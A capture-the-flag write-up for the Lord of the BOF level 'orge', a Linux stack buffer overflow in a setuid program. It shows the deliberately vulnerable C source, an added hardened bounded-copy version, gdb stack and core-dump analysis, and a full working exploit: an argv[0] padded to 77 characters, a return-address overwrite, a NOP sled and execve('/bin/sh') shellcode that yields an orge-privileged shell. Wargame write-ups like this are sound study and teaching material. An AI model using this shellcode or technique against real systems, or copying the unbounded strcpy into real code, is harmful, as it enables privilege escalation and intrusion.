LOB darkelf => orge
Problem
[darkelf@localhost darkelf]$ cat orge.c
/*
The Lord of the BOF : The Fellowship of the BOF
- orge
- check argv[0]
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* for strlen, memset, strcpy (missing from the listing) */
extern char **environ;
int main(int argc, char *argv[])
{
    char buffer[40];
    int i;
    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }
    // here is changed!
    if(strlen(argv[0]) != 77){
        printf("argv[0] error\n");
        exit(0);
    }
    // egghunter: wipe every environment string so nothing can be staged there
    for(i=0; environ[i]; i++)
        memset(environ[i], 0, strlen(environ[i]));
    if(argv[1][47] != '\xbf')
    {
        printf("stack is still your friend.\n");
        exit(0);
    }
    // check the length of argument (48 bytes allowed, but buffer holds only 40)
    if(strlen(argv[1]) > 48){
        printf("argument is too long!\n");
        exit(0);
    }
    strcpy(buffer, argv[1]);
    printf("%s\n", buffer);
    // buffer hunter: clear the buffer once it has been used
    memset(buffer, 0, 40);
    return 0;
}
A helpful comment, "// here is changed!", points out the part of the source that differs from the previous level.
This level checks that argv[0] is exactly 77 characters long; everything after that is the same as before.
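A hardened version of the same argument handling, as an added example (my own code, not part of the LOB level or of this write-up). It keeps the structure of main above but derives the bound from sizeof buffer instead of the hard-coded 48, so an argument that cannot fit together with its terminator is refused before any copy takes place; copy_arg, handle_arg and accepts_length are names I chose here.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Bounded replacement for strcpy(buffer, argv[1]) (added example, not LOB code).
 * The original compares strlen(argv[1]) against 48 while the destination is
 * char buffer[40]; the bound has to come from the destination, so the caller
 * passes sizeof buffer and anything that does not fit with its NUL is rejected. */
int copy_arg(char *dst, size_t dst_size, const char *src)
{
    size_t n = strlen(src);
    if (dst_size == 0 || n >= dst_size)
        return -1;                 /* would not fit: refuse instead of overflowing */
    memcpy(dst, src, n + 1);       /* n + 1 copies the terminator as well */
    return 0;
}

/* Mirror of the original main's buffer handling using the bounded copy.
 * Returns 0 when the argument was accepted and copied, 1 when it was refused. */
int handle_arg(const char *arg)
{
    char buffer[40];
    if (copy_arg(buffer, sizeof buffer, arg) != 0) {
        printf("argument is too long!\n");
        return 1;
    }
    printf("%s\n", buffer);
    memset(buffer, 0, sizeof buffer);   /* same "buffer hunter" cleanup as the original */
    return 0;
}

/* Self-check helper: build a constructed argument of `len` 'A' bytes (no real
 * command line needed) and report what handle_arg returned for it. */
int accepts_length(size_t len)
{
    char *s = malloc(len + 1);
    int rc;
    if (s == NULL)
        return -1;
    memset(s, 'A', len);
    s[len] = '\0';
    rc = handle_arg(s);
    free(s);
    return rc;
}

int main(int argc, char *argv[])
{
    if (argc < 2) {
        printf("argv error\n");
        return 1;
    }
    return handle_arg(argv[1]);
}
```

With this bound a 39-byte argument is still accepted (it fits with its NUL in 40 bytes), while the 40-byte and 48-byte inputs that the original program would happily copy over i, the saved frame pointer and the return address are refused.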
Solution
[darkelf@localhost darkelf]$ .///////orge aa
argv[0] error
[darkelf@localhost darkelf]$ ././orge
argv error
At first I wondered how on earth to make the first argument (the program path) 77 characters long, but then I simply tried invoking it as ././././orge or .//////////////orge and it worked.... One more piece of knowledge gained.
So now it should be enough to pad the path as .////.../orge until its length is 77, and then solve it the same way as darkelf.
[darkelf@localhost tmp]$ /bin/bash2
[darkelf@localhost tmp]$ gdb orge
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(gdb) set disassembly-flavor intel
(gdb) b*main
Breakpoint 1 at 0x8048500
(gdb) r `python -c "print 'A'*47 + '\xbf'"`
Starting program: /home/darkelf/tmp/orge `python -c "print 'A'*47 + '\xbf'"`
Breakpoint 1, 0x8048500 in main ()
(gdb) x/100wx $esp
--- omitted ---
0xbffffbec: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffbfc: 0x00000000 0x69000000 0x00363836 0x6d6f682f
0xbffffc0c: 0x61642f65 0x6c656b72 0x6d742f66 0x726f2f70
0xbffffc1c: 0x41006567 0x41414141 0x41414141 0x41414141
0xbffffc2c: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffc3c: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffc4c: 0x00bf4141 0x5353454c 0x4e45504f 0x752f7c3d
(gdb)
0xbffffc5c: 0x622f7273 0x6c2f6e69 0x70737365 0x2e657069
0xbffffc6c: 0x25206873 0x53550073 0x414e5245 0x003d454d
0xbffffc7c: 0x54534948 0x455a4953 0x3030313d 0x4f480030
0xbffffc8c: 0x414e5453 0x6c3d454d 0x6c61636f 0x74736f68
0xbffffc9c: 0x636f6c2e 0x6f646c61 0x6e69616d 0x474f4c00
0xbffffcac: 0x454d414e 0x7261643d 0x666c656b 0x4d455200
0xbffffcbc: 0x4845544f 0x3d54534f 0x2e323931 0x2e383631
0xbffffccc: 0x2e333931 0x414d0031 0x2f3d4c49 0x2f726176
--- omitted ---
(gdb) q
I ran it under the debugger to get a rough idea of where the A's land on the stack.
[darkelf@localhost tmp]$ `python -c "print '.'+'/'*72+'orge ' + 'A'*44+'\x4c\xfd\xff\xbf ' + '\x90'*100 + '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80'"`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAL?
Segmentation fault (core dumped)
[darkelf@localhost tmp]$
Then I put a roughly estimated address in as the return address, followed it with a run of NOPs and the shellcode, and ran it; it crashed with a segmentation fault and dumped core.
[darkelf@localhost tmp]$ gdb -c core
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux".
Core was generated by `.////////////////////////////////////////////////////////////////////////orge A'.
Program terminated with signal 11, Segmentation fault.
#0 0xbffffff7 in ?? ()
(gdb) x/100wx $esp
--- omitted ---
0xbffffaa0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffab0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffac0: 0x00000000 0x69000000 0x00363836 0x2f2f2f2e
0xbffffad0: 0x2f2f2f2f 0x2f2f2f2f 0x2f2f2f2f 0x2f2f2f2f
0xbffffae0: 0x2f2f2f2f 0x2f2f2f2f 0x2f2f2f2f 0x2f2f2f2f
0xbffffaf0: 0x2f2f2f2f 0x2f2f2f2f 0x2f2f2f2f 0x2f2f2f2f
0xbffffb00: 0x2f2f2f2f 0x2f2f2f2f 0x2f2f2f2f 0x2f2f2f2f
(gdb)
0xbffffb10: 0x2f2f2f2f 0x67726f2f 0x41410065 0x41414141
0xbffffb20: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffb30: 0x41414141 0x41414141 0x41414141 0x41414141
0xbffffb40: 0x41414141 0xfd4c4141 0x9000bfff 0x90909090
0xbffffb50: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb60: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb70: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb80: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb90: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffba0: 0x90909090 0x90909090 0x90909090 0x31909090
0xbffffbb0: 0x2f6850c0 0x6868732f 0x6e69622f 0x5350e389
0xbffffbc0: 0xc289e189 0x80cd0bb0 0x00000000 0x00000000
0xbffffbd0: 0x00000000 0x00000000 0x00000000 0x00000000
--- omitted ---
(gdb)
So I analyzed the core file to find the address I actually needed to jump to, changed the return address to point into the middle of the NOP sled, and ran it again.
[darkelf@localhost tmp]$ `python -c "print '.'+'/'*72+'orge ' + 'A'*44+'\xa0\xfb\xff\xbf ' + '\x90'*100 + '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80'"`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA??
bash$ id
uid=506(darkelf) gid=506(darkelf) groups=506(darkelf)
bash$
bash ran successfully against the copy in tmp. Now let's run it against the real binary.
[darkelf@localhost darkelf]$ /bin/bash2
[darkelf@localhost darkelf]$ `python -c "print '.'+'/'*72+'orge ' + 'A'*44+'\xa0\xfb\xff\xbf ' + '\x90'*100 + '\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80'"`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA??
bash$ id
uid=506(darkelf) gid=506(darkelf) euid=507(orge) egid=507(orge) groups=506(darkelf)
bash$